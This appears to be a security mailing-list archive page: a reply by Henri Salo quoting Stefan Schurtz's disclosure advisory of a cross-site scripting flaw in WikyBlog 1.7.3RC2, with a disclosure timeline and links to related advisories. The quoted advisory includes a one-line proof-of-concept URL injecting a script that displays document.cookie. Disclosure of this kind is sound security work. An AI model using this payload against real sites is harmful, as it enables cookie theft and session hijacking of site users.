[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: WikyBlog 1.7.3RC2 XSS vulnerability

To: sschurtz@xxxxxxxxxxxxxxx
Subject: Re: WikyBlog 1.7.3RC2 XSS vulnerability
From: Henri Salo <henri@xxxxxxx>
Date: Sun, 18 Mar 2012 11:50:05 +0200

This seems to be same issue as http://secunia.com/advisories/38699/ / 
http://osvdb.org/show/osvdb/62558

I created item about this case to their sf issue tracker: 
https://sourceforge.net/tracker/?func=detail&aid=3507681&group_id=148518&atid=771904

- Henri Salo

On Thu, Mar 15, 2012 at 05:31:41PM +0000, sschurtz@xxxxxxxxxxxxxxx wrote:
> Advisory:             WikyBlog 1.7.3RC2 XSS vulnerability
> Advisory ID:          SSCHADV2012-006
> Author:                       Stefan Schurtz
> Affected Software:    Successfully tested on WikyBlog 1.7.3RC2
> Vendor URL:           http://www.wikyblog.com/
> Vendor Status:                informed
> 
> ==========================
> Vulnerability Description
> ==========================
> 
> WikyBlog 1.7.3RC2 is prone to a XSS vulnerability
> 
> ==================
> PoC-Exploit
> ==================
> 
> http://[target]/WikyBlog-1.7.3rc2/index.php/Special/Main/Templates?cmd=copy&which='"<script>alert(document.cookie)</script>
> 
> =========
> Solution
> =========
> 
> -
> 
> ====================
> Disclosure Timeline
> ====================
> 
> 25-Feb-2012 - vendor informed
> 15-Mar-2012 - no response from vendor
> 
> ========
> Credits
> ========
> 
> Vulnerability found and advisory written by Stefan Schurtz.
> 
> ===========
> References
> ===========
> 
> http://www.darksecurity.de/advisories/2012/SSCHADV2012-006.txt

References:
- WikyBlog 1.7.3RC2 XSS vulnerability
  - From: sschurtz

Prev by Date: [ MDVSA-2012:031 ] firefox
Next by Date: Android wipe unreliable
Previous by thread: WikyBlog 1.7.3RC2 XSS vulnerability
Next by thread: [SECURITY] [DSA 2433-1] iceweasel security update
Index(es):
- Date
- Thread